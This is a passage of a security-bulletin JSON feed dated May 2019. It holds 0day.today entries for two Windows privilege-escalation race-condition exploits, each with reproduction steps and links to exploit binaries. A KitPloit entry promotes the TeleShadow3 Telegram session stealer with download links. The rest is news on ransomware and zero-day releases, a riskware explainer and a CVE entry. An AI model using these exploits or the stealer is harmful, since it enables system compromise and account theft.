"NONE"}, "sourceHref": "https://0day.today/exploit/32789"}, {"lastseen": "2019-05-24T15:56:36", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32788", "href": "https://0day.today/exploit/description/32788", "title": "Microsoft Windows (x84/x64) - Error Reporting Discretionary Access Control List / Local Privilege", "type": "zdt", "sourceData": "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation\r\n\r\n\r\nEDIT: Apparently this was patched earlier this month.. so whatever.\r\n\r\nWindows Error Reporting Arbitrary DACL write\r\n\r\nIt can take upwards of 15 minutes for the bug to trigger. If it takes too long, closing the program, cleaning out the reportarchive folder in programdata (it may mess up the timing if there's too many reports in there as result of running our poc for too long), deleting the c:\\blah folder.. etc.. might help. \r\n\r\nI guess a more determined attacker might be able to make it more reliable. It is just an insanely small window in which we can win our race, I wasn't even sure if I could ever exploit it at all. \r\n\r\nI don't see a way to use OPLOCKS to reliably win the race.. and while I can make it work fairly reliable in my VM, I need to use a \"rand()\" function to bruteforce a delay needed to hit the correct timing.. because this timing will vary wildly from hardware setup to setup.\r\n\r\nOverview:\r\n\r\n1. We turn c:\\programdata\\microsoft\\windows\\wer\\reportqueue into a junction point to c:\\blah \r\n\r\n2. In c:\\blah we create a folder named 1_1_1_1_1, and inside we dump a .wer file and another file called test\r\n\r\n3. We trigger the WER reporting queue task\r\n\r\n4. When the service tries to write a DACL we delete the file \"test\" after it calls GetSecurityFile on it and replace it with a hardlink, on which the service will call SetSecurityFile.\r\n\r\nBug description:\r\n\r\nThe WER service will try to delete both files while not impersonating when we trigger the reporting queue task. It does extensive testing against junctions.. so we cannot abuse that.\r\n\r\nHowever it will write a DACL to both files, to ensure that SYSTEM has the \"delete\" right over them. The way this works is in two steps:\r\n\r\n1. It calls GetFileSecurity and gets a security descriptor (or whatever the technical name is)\r\n\r\n2. It adds some stuff to the security descriptor so SYSTEM has delete rights, and then writes it back to the file using SetFileSecurity\r\n\r\nIt also closes file handles between both function calls which is convenient.\r\n\r\nThis means that if between both function calls we plant a hardlink.. it will first get the security descriptor from a normal file which authenticated users can write to. It will then copy these permissions, and applies this security descriptor to a hardlink pointing to an entirely different file.\r\n\r\nThe race condition is incredibly hard to win. I havn't tested on another setup.. but you definitely need multiple processor cores and you may have to wait minutes for it to work (It can take a really long time.. ). Anyway... in an LPE scenario time is not that much of an issue. \r\n\r\nA succesful run will look like this. You can see the hardlink being created after the QuerySecurityFile and before SetSecurityFile.\r\n\r\nYou can also ofcourse look in IDA (wer.dll) and confirm there. The vulnerable function is: UtilAddAccessToPath\r\n\r\nSteps to reproduce:\r\n\r\n1. Copy AngryPolarBearBug.exe and report.wer into the same folder\r\n\r\n2. Run AngryPolarBearBug.exe\r\n\r\nAfter many long minutes it should stop and c:\\windows\\system32\\drivers\\pci.sys should now by writeable from non-admin.\r\n\r\nAgain.. I have only tested this on both my VM and host, I don't even know if the random delay range will work on other hardware setups (it basically tries to bruteforce the correct timing).. so I hope you can repo it.\r\n\r\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46917.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32788"}, {"lastseen": "2019-05-24T15:57:02", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32787", "href": "https://0day.today/exploit/description/32787", "title": "Microsoft Windows 10 (17763.379) - Install DLL Exploit", "type": "zdt", "sourceData": "edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag to hide installer UI and find another way to trigger rollback (i.e through installer api, injecting into medium IL msiexec etc)\r\n\r\n## Installer - capturing rolback scripts - patch bypass #2\r\n\r\nThere is still a race condition in the installer.\r\n\r\nSo there is a really small timing window to win a race, where if we set a junction after the check but before it writes the DACL we can still get our original PoC to work.\r\n\r\nAgain, it's a really small timing window, and while it appears to reliably reproduce on my setup.. I don't know if it will for yours. I've attached a procmon.exe log.\r\n\r\nHow to reproduce:\r\n\r\n1. Run polarbear.exe (make sure to copy test.rbf and test.rbs in the same directory)\r\n\r\n2. Open a cmd and run an installer (has to be an autoelevating installer in c:\\windows\\insatller) this way \"msiexec /fa c:\\windows\\installer\\123123213.msi\"\r\nWhen we pass the repair flag, it usually gives us a little more time to press the cancel button and trigger rollback. \r\npolarbear.exe will print out when you have to press cancel. So you don't press it too early!\r\n\r\n3. If all is successful it will write oops.dll to system32. If failed.. make sure to delete the following folders: config.msi, new, new2, new3.\r\nUse the included video demo as guide... as the process is kind of complicated!\r\n\r\nFilter I used in procmon:\r\n\r\nYou should see this on a successful run:\r\n\r\nThe mount point on c:\\config.msi has to be create after querynetworkfile and before setsecurityfile.\r\n\r\n\r\n\r\nEDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46916.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32787"}], "kitploit": [{"lastseen": "2019-05-24T01:35:30", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-x6b6HzWe-nU/XOOAhVn__qI/AAAAAAAAO8A/E91WKr-8DOUMp-xNg4APKRM3Gysv2nRzgCLcBGAs/s1600/TeleShadow3_1_screenshot.png>)\n\n \nTeleshadow3- Advanced [ Telegram ](<https://www.kitploit.com/search/label/Telegram> \"Telegram\" ) Desktop Session Hijacker! \n \n** Download ** \nClick [ HERE ](<https://github.com/EternalC0der/TeleShadow3/releases/download/3.1.0/Teleshadow.3.1.rar> \"HERE\" ) to download the latest version! \n \n** Stealing desktop telegrams has never been so easy! ** \nSet the email and sender details of the sender and recipient or use Telegram API! and send it to the victim after compiling. \n \n** How do I use the session file? ** \nJust put tdata and telegram.exe in the same directory and open telegram.exe \n \n** What features does it have? ** \n\n\n * Bypass new security mechanisms \n\n * Bypass Two-step verification! \n\n * Bypass Inherent identity and need 5-digit verification code! \n\n * Support SMTP Transport \n\n * Support Telegram API Transport (With Proxy) \n\n * Support FakeMessage \n\n * Support Custom Icons \n\n * Bypass A.V (Comming soon...) \n\n * NOTE: Only official telegram desktops currently supported \n\n \n \n\n\n** [ Download TeleShadow3 ](<https://github.com/EternalC0der/TeleShadow3> \"Download TeleShadow3\" ) **\n", "modified": "2019-05-23T21:57:02", "published": "2019-05-23T21:57:02", "id": "KITPLOIT:2101113398719974316", "href": "http://www.kitploit.com/2019/05/teleshadow-v3-telegram-desktop-session.html", "title": "TeleShadow v3 - Telegram Desktop Session Stealer (Windows)", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-05-23T20:29:18", "bulletinFamily": "info", "description": "Shade, a ransomware known to target Russian victims, has been spotted in several recent campaigns scoping out new locations \u2013 including in the U.S. and Japan.\n\nThe ransomware, [first spotted in late 2014](<https://securelist.com/the-shade-encryptor-a-double-threat/72087/>) by Kaspersky Lab researchers, has been known for focusing on Russian victims \u2013 but more recent cyberattacks indicate that the majority of Shade ransomware executables are targeting users outside of Russia.\n\n\u201cIn fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union; they are the United States, Japan, India, Thailand, and Canada,\u201d said Brad Duncan, researcher with Palo Alto Networks\u2019 Unit 42 group [in a Wednesday analysis](<https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/?utm_source=marketo&utm_medium=email&utm_campaign=Digest%201254-2019-04-26T15:20:17.000-07:00&mkt_tok=eyJpIjoiWkRRMlpETmlPR0k1TVdZMCIsInQiOiJrQVNnUVVVSkRiTUpPVTQ0amN2OEdTdW5uS2NocmpPSXh6eVVxTDZsdUZKcFhmeDU2OTlrOEVVbVZZdTk5cUU2Rmg2UVRkSkZxb3ExbG92eFJvK3d1SWNcL3g0eHY5Vzl3RFBvMlNrRlwvXC9ldnl0YXdCaW03NHJXR0pEMXNrR2lidCJ9>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMeanwhile, \u201cRussia only occurs at number seven, and the only other country we found in the top ten where Russian is an official language is Kazakhstan, at number 10. The top industries attacked in these countries were high-tech, wholesale and education.\u201d\n\n## Ransomware Campaigns\n\nThe Shade ransomware is spread through malspam emails. In a recent February 2019 campaign for instance, the emails touted a link to an archive, archive attachment or attached PDF with a link to an archive, disguised as an invoice or bill.\n\nThese links and attachments lead to a Javascript or other script-based file that is designed to retrieve the Shade executable file.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/23152456/Figure-1.-Desktop-of-a-Windows-host-infected-with-Shade-ransomware.png>)\n\nInterestingly, the payload remains \u201cremarkably consistent\u201d since its discovery in 2014, researchers said.\n\n\u201cWhen a Windows host is infected with Shade ransomware, its desktop background announces the infection, and 10 text files appear on the desktop, named README1.txt through README10.txt,\u201d researchers said.\n\nThe desktop background message reads: \u201cAttention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.\u201d\n\nAll of the README.txt files say the same thing: That is, asking users to send a code to an email address, which would then instruct them on how to make the payments.\n\n## New Targets\n\nRecent malicious Shade emails are being sent to various countries other than Russia, indicating that the ransomware developers are looking to expand the breadth of their victim sets.\n\nResearchers conducted a deeper analysis between January through March 2019, tracking attempted deliveries of the Shade ransomware executable during an infection chain, focusing on packed executable (PE) files sent through a URL over TCP port 80.\n\nResearchers found that the U.S. saw the most number of attempts to inject systems with Shade (outpacing Japan, India and Thailand).\n\n\u201cThe top country with Shade ransomware inf[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/23152922/Figure-6-Top-ten-countries-from-our-AutoFocus-search-results-as-shown-on-a-world-map.png>)ection attempts among our customer base was the United States,\u201d according to Palo Alto. \u201cThe vast majority of these URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian-language countries.\u201d\n\nMeanwhile, the most common targets for Shade ransomware infection attempts were organizations in the high-tech category. Wholesale and retail, along with education and telecommunications, were also popular targets.\n\nWhile researchers acknowledged that their results may be skewed towards English due to Palo Alto\u2019s customer base from which it gathers its telemetry, \u201cthe analysis still \u201cindicates Shade ransomware is very active outside of Russia and possibly targeting more English-speaking victims than Russian.\u201d\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-23T20:24:34", "published": "2019-05-23T20:24:34", "id": "THREATPOST:EDC3C82309349081A2843F7D9491CAC5", "href": "https://threatpost.com/shade-ransomware-expands-us/145020/", "type": "threatpost", "title": "Shade Ransomware Expands to U.S. Targets", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-23T15:22:30", "bulletinFamily": "info", "description": "On the heels of releasing a Windows zero-day exploit on Wednesday, developer SandboxEscaper has dropped exploit code for four more flaws on Thursday morning.\n\nOn Wednesday, she dropped a Windows zero-day exploit that would allow local privilege-escalation (LPE), by importing legacy tasks from other systems into the Task Scheduler utility \u2013 and she [promised four more unpatched bugs](<https://threatpost.com/windows-zero-day-lpe/144976/>) while she was at it.\n\nSandboxEscaper held true to that promise, [on Thursday releasing](<https://github.com/SandboxEscaper/polarbearrepo>) on GitHub the proof-of-concepts (PoCs) for another three Windows LPE flaws, and a sandbox-escape zero-day vulnerability impacting Internet Explorer 11. One of them however turns out to already be patched.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn a Thursday [blog post](<https://sandboxescaper.blogspot.com>), the developer confirmed that she had uploaded the remaining bugs:\n\n> Uploaded the remaining bugs. \nI like burning bridges. I just hate this world. \nps: that last windows error reporting bug was apparently patched this month. Other 4 bugs on github are still 0days. have fun.\n\nAs she pointed out, one flaw for which exploit code was dropped on Thursday, [a Windows Error Reporting](<https://github.com/SandboxEscaper/polarbearrepo/tree/master/angrypolarbearbug2>) (WER) bug ([CVE-2019-0863](<https://portal.msrc.microsoft.com/en-us/security-guidance/en-us/security-guidance/advisory/CVE-2019-0863>)), was actually patched earlier this month in Microsoft\u2019s May Patch Tuesday fixes (acknowledgement was given to a Palo Alto Networks researcher and \u201cPolar Bear,\u201d an alias sometimes used by SandboxEscaper). That is an elevation-of-privilege vulnerability that exists in the way WER handles files, enabling an attacker to run arbitrary code in kernel mode; install programs; view, change or delete data; or create new accounts with administrator privileges.\n\nThe second flaw is a [zero-day impacting Internet Explorer 11](<https://github.com/SandboxEscaper/polarbearrepo/tree/master/sandboxescape>), which could enable bad actors to inject a dynamic link library (DLL) into Internet Explorer. The third is a bypass for a previously released patch addressing a Windows permissions-overwrite, privilege-escalation flaw ([CVE-2019-0841](<https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/>)). The bug exists because Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\nA final flaw is an \u201c[installer bypass](<https://github.com/SandboxEscaper/polarbearrepo/tree/master/InstallerBypass>)\u201d issue in Windows update, a demo for which was uploaded onto GitHub and is pasted below:\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/23103536/demo.mp4>\n\nFor this flaw, \u201cthere is still a race condition in the installer.\\par,\u201d said SandboxEscaper. \u201cSo there is a really small timing window to win a race, where if we set a junction after the check but before it writes the DACL [Discretionary Access Control List] we can still get our original PoC to work. Again, it\u2019s a really small timing window, and while it appears to reliably reproduce on my setup\u2026I don\u2019t know if it will for yours. I\u2019ve attached a procmon.exe log.\u201d\n\nThough SandboxEscaper released PoC demos for these last three flaws, researchers have not yet confirmed their validity.\n\nThe motivation for releasing exploit code without giving the vendor time to issue a patch is unclear, though earlier in the week, SandboxEscaper said she would like to sell the exploits to non-Western buyers for 60,000 in unspecified currency.\n\n\u201cClearly she isn\u2019t a fan of the west,\u201d said Adam Kujawa, director of Malwarebytes Labs, speaking to Threatpost. \u201cHer motivation may be political, however since she isn\u2019t a reverse engineer and her \u2018exploits\u2019 are more privilege-escalation attacks than methods of infecting new systems (which make them far less dangerous than other exploits out there), I doubt she is a professional vulnerability hunter. However, she is obviously financially motivated.\u201d\n\nSandboxEscaper has released fully functional Windows zero-days in the past: In August, for instance, she [debuted another Task Scheduler flaw](<https://threatpost.com/microsoft-windows-zero-day-found-in-task-scheduler/136977/>) on Twitter, which was quickly [exploited in the wild](<https://threatpost.com/active-spy-campaign-exploits-unpatched-windows-zero-day/137237/>) in a spy campaign just two days after disclosure.\n\nIn October, SandboxEscaper [released an exploit](<https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/>) for what was dubbed the \u201cDeletebug\u201d flaw, found in Microsoft\u2019s Data Sharing Service (dssvc.dll). And towards the end of 2018 she [offered up two more](<https://threatpost.com/microsoft-windows-rce-flaw-gets-temporary-micropatch/141067/>): The \u201cangrypolarberbug,\u201d which allows a local unprivileged process to overwrite any chosen file on the system; and a vulnerability allows an unprivileged process running on a Windows computer to obtain the content of arbitrary file \u2013 even if permissions on such file don\u2019t allow it read access.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-23T15:10:56", "published": "2019-05-23T15:10:56", "id": "THREATPOST:534BB9E9C6E050F2EC737BC5E5714A3F", "href": "https://threatpost.com/sandboxescaper-more-exploits-ie-zero-day/145010/", "type": "threatpost", "title": "SandboxEscaper Drops Three More Windows Exploits, IE Zero-Day", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-23T14:39:22", "bulletinFamily": "info", "description": "The price of Bitcoin is steadily surging in May and hackers are looking to cash in on the uptick with fake cryptocurrency apps, malware and other related scams.\n\nIn May 2019, [Bitcoin prices climbed](<https://www.cryptoglobe.com/latest/2019/05/significant-bitcoin-price-increase-expected-due-to-mining-rewards-halving-analyst/>) to their highest points this year, with the popular cryptocurrency being worth $8,300 (its highest valuation since September 2018) for one bitcoin. That has malicious actors on the prowl and hungry to attack cryptocurrency investors using a slew of scams, malicious apps, malware and cryptojacking campaigns.\n\n\u201cNot surprisingly, cybercrooks were quick to notice this development and started upping their efforts in targeting cryptocurrency users with various scams and malicious apps,\u201d said Lukas Stefanko, researcher with ESET, [on Thursday](<https://www.welivesecurity.com/2019/05/23/fake-cryptocurrency-apps-google-play-bitcoin/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSimilar surges in cryptocurrency pricing in 2018 brought about fluctuations of [cryptocurrency giveaway scams](<https://threatpost.com/attackers-cashing-in-on-cryptocurrency-with-increased-scams/132275/>) and [cryptominer malware](<https://threatpost.com/cryptominer-malware-threats-overtake-ransomware-report-warns/131237/>). This year is seeing a spike in cybercrime activity related to this latest bitcoin boom \u2013 and that\u2019s even despite the recent [shuttering of Coinhive](<https://threatpost.com/coinhive-monero-shutdown/142290/>), the company behind the infamous browser-based cryptocurrency miner.\n\n## Malicious Apps\n\nOne way cybercrooks are looking to scam bitcoin investors is through fake apps, purporting to be cryptocurrency wallet apps used to store, access and share cryptocurrency.\n\nIn a recent example, ESET researchers on Thursday said that they have spotted fake apps impersonating cryptocurrency wallets \u2013 including Trezor and Coin Wallet \u2013 looking to fool cryptocurrency users on Google Play. Both apps have since been removed from Google Play.\n\nOne such app on Google Play was impersonating Trezor, a popular cryptocurrency wallet that requires physical authentication via PIN to access stored cryptocurrency. While Trezor\u2019s official app is called \u201cTrezor Manager,\u201d researchers recently discovered a malicious app, called \u201cTrezor Mobile Wallet,\u201d which touted Trezor\u2019s official branding, developer name, category and description.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/23090047/Figure1-wm.png>)\n\nAfter installation, the fake app appears on the victim\u2019s phone as \u201cCoin Wallet,\u201d and once launched, the app shows attempts to phish for credentials (email and password).\n\n\u201cTrezor confirmed the fake app did not pose a direct threat to their users\u2026 However, they did express concern that the email addresses collected via fake apps such as this one could be later misused for phishing campaigns targeted against Trezor users,\u201d said Stefanko.\n\nMeanwhile, another malicious app, the Coin Wallet app, was using the same server as the fake Trezor app. Coin Wallet was available on Google Play until May 5, and was installed by more than 1,000 users.\n\nCoin Wallet pretends to generate a unique wallet address where users can transfer their coins \u2013 but in reality, the address in the app belongs to the attackers\u2019 wallet.\n\n\u201cThe app claims it lets its users create wallets for various cryptocurrencies,\u201d said Stefanko. \u201cHowever, its actual purpose is to trick users into transferring cryptocurrency into the attackers\u2019 wallets \u2013 a classic case of what we named wallet address scams in our previous research of cryptocurrency-targeting malware.\u201d\n\n## Cryptojacking\n\nLast year, researchers noted a major uptick in coin-mining: There was a 1,500 percent increase in cryptomining malware when compared to 2017, according to a [December report](<https://www.esentire.com/resources/knowledge/2018-annual-threat-report/>) from eSentire Threat Intelligence.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/05/23085802/Monero-underground-threads.png>)\n\nWith bitcoin prices on the rise, that uptick may continue into 2019. Miner software is often used by hackers, who secretly embed the code into websites and then mine cryptocurrency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\nIn April, a malicious new cryptojacking campaign dubbed Beapy used the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. The attacks \u2013 which infected more than 12,000 devices across 732 firms, led to slowdown in enterprise devices\u2019 performance, overheating batteries, and even devices becoming degraded and unusable.\n\n\u201cWhile enterprises might think they don\u2019t need to worry about cryptojacking as much as more disruptive threats such as ransomware, it could still have a major impact on the company\u2019s operations,\u201d researchers with Symantec, who discovered the campaign, said in an analysis.\n\nOther malware is adopting more cryptocurrency theft capabilities, including a [Windows malware dubbed \u201cRazy\u201d](<https://threatpost.com/razy-browser-extensions-theft/141181/>) discovered earlier this year that works by weaponizing browser extensions in order to perpetrate a range of online scams on unwitting victims.\n\n\u201cIf bitcoin continues its growth trend, we can expect more cryptocurrency scam apps to emerge in the official Android app store and elsewhere,\u201d said Stefanko.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-23T14:06:46", "published": "2019-05-23T14:06:46", "id": "THREATPOST:DE49AECF01AE4395DC4A6585BD3EEC49", "href": "https://threatpost.com/soaring-cryptocurrency-prices-draw-malicious-new-onslaught-of-apps-malware/144998/", "type": "threatpost", "title": "Soaring Cryptocurrency Prices Draw Malicious Apps, Malware", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2019-05-23T20:21:51", "bulletinFamily": "blog", "description": "If there\u2019s one thing I like more than trivia quizzes, it\u2019s quotes. Positive, inspirational, and motivational quotes. Quotes that impart a degree of ancient wisdom, or those that make you stop and consider. Reading them melts our fears, sorrows, and feelings of inadequacy away.\n\nSome of the most inspiring quotes urge us to take risks in order to find meaning. If you don\u2019t take risks, they say, you won\u2019t be able to achieve remarkable things. The biggest risk, they say, is not taking a risk at all.\n\nBut when it comes to computer security, all that goes out the window. Taking risks on software you download onto your devices is not a recipe for success. Even if the programs are inherently benign, some may have features that can be used against you by those with malicious intent. No good can come of that. \n\n### What are these risky programs you\u2019re talking about?\n\nDid I lose you at \"quotes?\" That's alright. These software programs that contain features that can easily be abused are known as [riskware](<https://blog.malwarebytes.com/glossary/riskware/>). They may come pre-installed on your computing device or they are downloaded and installed by malware. \n\n### How can something legit be a risk?\n\nSuch software was designed to have powerful features so it can do what it was programmed to do. Unfortunately, those same features can be used and/or abused by threat actors as part of a wider attack or campaign against a target. Riskware contains loopholes or vulnerabilities that can be exploited by cybercriminals and the threats they develop.\n\nFor example, there are monitoring apps available in the market that private individuals, schools, and businesses use to look after their loved ones, watch what their students are doing, or check employee activities. Those with ill intent could take over these apps to stalk certain individuals or capture sensitive information via logging keystrokes.\n\n* * *\n\n_Read: [When spyware goes mainstream](<https://blog.malwarebytes.com/cybercrime/2018/09/when-spyware-goes-mainstream/>)_\n\n* * *\n\nRiskware can be on mobile devices, too. On Android, there are apps created with an auto-install feature that have system-level rights and come pre-installed on devices; therefore, they cannot be removed (but can be disabled). The auto-installer we detect as [Android/PUP.Riskware.Autoins.Fota](<https://blog.malwarebytes.com/detections/android-pup-riskware-autoins-fota/>), however, cannot be manually deactivated. Once exploited, it can be used to secretly auto-install malware onto susceptible devices.\n\nNote that if you install software that your [anti-malware program](<http://www.malwarebytes.com/pricing>) detects as riskware, then you need only make sure your security program is updated to stay safe.\n\n### How can you tell which software is riskware?\n\nThere are varying levels of malicious intent and capabilities for all software. In fact, any program should be assumed to have potential flaws and vulnerabilities that can be exploited. However, there are criteria for determining what is considered malware vs. riskware, and which software is deemed \"safe.\"\n\n[Pieter Arntz](<https://blog.malwarebytes.com/101/2017/06/interview-with-a-malware-hunter-pieter-arntz/>), malware intelligence researcher and riskware expert, makes this clear when he said that riskware can be classified based on the risks to data and devices involved. \n\n\u201cIn my opinion, there are a few major categories of riskware, and you can split them up by type of risk they introduce,\u201d Arntz said. \u201cSome bring risk to the system because they introduce extra vulnerabilities, such as unlicensed Windows with updates disabled. Some bring risk to the user because having them is forbidden by law in some countries, such as hacking tools.\u201d\n\nArntz continues: \u201cSome monitor user behavior. When this is by design, a software may be labelled as riskware rather than spyware. Some bring risk to the system because they are usually accompanied by real malware, and their presence can be indicative of an infection. [And] some bring risk to the user because their use is against the Terms of Service of other software on the system, such as cracks.\u201d\n\n### What's the difference between riskware and PUPs?\n\nRiskware and potentially unwanted programs (PUPs) are similar in that their mere presence could open systems up to exploitation. So, it\u2019s no surprise that users might liken one to the other. However, there are different criteria for classifying [riskware](<https://blog.malwarebytes.com/detections/riskware/>) and [PUPs](<https://blog.malwarebytes.com/detections/pup-optional/>).\n\nPrograms might be termed riskware because they put the user at risk in some way by:\n\n * Violating the terms of service (ToS) of other software or a user platform on the device.\n * Blocking another application or software from being updated and patched.\n * Being illegal in the user's country.\n * Potentially being used as a backdoor for other malware.\n * Being indicative of the presence of other malware.\n\nWhereas programs might be considered PUPs because:\n\n * They may have been installed without the user\u2019s consent.\n * They may be supported by aggressive advertisements.\n * They may be [bundlers](<https://blog.malwarebytes.com/glossary/bundler/>) or part of a bundle.\n * They may be misleading or offer a false sense of security.\n\nRegardless of whether a program is a PUP or riskware, it's important to evaluate critically whether or not the software is as useful and relevant as it is a nuisance or a potential risk. \n\n### Should I keep quarantined riskware or remove it?\n\nIf your anti-malware program detects and quarantines riskware, you likely have a choice whether or not to keep it. Our advice is to make a decision based on whether or not you installed the riskware yourself and then, if you did, weighing the benefits of the app against the risks outlined in the detection.\n\nIf riskware was installed without the user's knowledge, it's possible the software is part of an attack ensemble delivered by malware. I\u2019d be more worried about the presence of malware in this case, and would delete the offending riskware.\n\nIf you want your anti-malware to stop detecting software you use that is classified as riskware, see if you can configure your security solution to exclude the file or whitelist it. That way, the software won\u2019t be detected in the future. Want to know how to do this with your Malwarebytes product? Go [here](<https://blog.malwarebytes.com/detections/riskware/>).\n\nStay safe out there!\n\nThe post [Knowing when it\u2019s worth the risk: riskware explained](<https://blog.malwarebytes.com/101/2019/05/knowing-when-its-worth-the-risk-riskware-explained/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-05-23T19:22:47", "published": "2019-05-23T19:22:47", "id": "MALWAREBYTES:72B9410F7AC6E4033C197931EFA30E05", "href": "https://blog.malwarebytes.com/101/2019/05/knowing-when-its-worth-the-risk-riskware-explained/", "type": "malwarebytes", "title": "Knowing when it\u2019s worth the risk: riskware explained", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-05-24T10:39:51", "bulletinFamily": "NVD", "description": "An integer overflow that leads to a use-after-free in WebMIDI in Google Chrome on Windows prior to 73.0.3683.75 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page.", "modified": "2019-05-23T16:29:00", "published": "2019-05-23T16:29:00", "id": "CVE-2019-5789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5789", "title": "CVE-2019-5789", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2019-05-23T20:26:53", "bulletinFamily": "blog", "description": "So, what is the BOCC?\n\nSimply put, Akamai runs a state-of-the-art [Broadcast Operations Control Centre](<https://www.akamai.com/us/en/services/broadcast-operations-control-center-bocc.jsp>), the BOCC, to help ensure smooth and seamless end-user play-back experience for live OTT (Over the Top) and linear video delivered through [Akamai Media Delivery Solutions](<https://www.akamai.com/us/en/products/media-delivery/>). To phrase it more technically - the BOCC is a support service providing effective 24x7x365 real-time, high-density monitoring towards ensuring lower latency, continued availability, and buffering-free playback of video streams covering most stages of over-the-top streaming workflow.\n\n[](<https://blogs.akamai.com/assets_c/2019/05/bocc%20image%20one-9079.html>)\n\nWith an increase in internet-based video consumption, especially among the mobile audience and OTT adoption on connected TVs, the state-of-quality-and-latency demand around streaming experiences is challenged to improve. Accordingly, many changes and improvisations are seen in streaming technologies and associated performance expectations, including the shift to HTTP-based adaptive streaming, media security, CMAF for standardization and chunked encoding/transfer to achieve lowest hand-waving latency, ad-insertion methodologies, and more. \n\nGiven these, an effective operations and monitoring service like BOCC is only as effective as its hold on 3 key areas:\n\n 1. The Streaming technology\n 2. The Monitoring technology\n 3. The People, subject matter experts, on both streaming and monitoring\n\nA focused positioning and organic evolution since inception have helped Akamai build a talented resource base with expertise on core streaming technologies and video distribution over the internet. Through the BOCC, this expertise is made available as a service. The BOCC has at its disposal an entire suite of supporting systems and tools to enable proactive monitoring and in-time diagnosis of live and linear streaming issues and their appropriate remediation. The key tenets of monitoring and diagnosis included as part of the BOCC are:\n\n 1. Data that matters\n 2. Tools and analytics solutions that derive valuable inference from data\n 3. Timely inference when it matters\n\nHere is a summary of the data and analytics tools available through the BOCC. Also indicated is how Akamai Media Delivery products such as live/linear stream ingest, delivery and playback map to the simplified streaming workflow while being the space of operations for the BOCC.\n\n#### [](<https://blogs.akamai.com/assets_c/2019/05/bocc%20image%20two-9082.html>)\n\n### Data that Matters\n\nThe BOCC has access to key metrics from all of the layers feeding into the streaming workflow. This includes:\n\n * First Mile (Stream Origin for 3rd Party Origins, Ingest and Mid-Tiers for Akamai Media Services Live, or Live Origin)\n * Middle Mile (Tiered Akamai Intelligent Network Cache and Edge Servers)\n * Last Mile (Client/Player perspective, if Customer has Akamai Media Analytics integrated into video players)\n\nThere are more than 100 metrics provided to help understand the state of the workflow. Here is a sample of the nature of metrics:\n\n * Playback errors, startup time, bitrate, buffering rate and duration\n * Edge errors, request processing time, 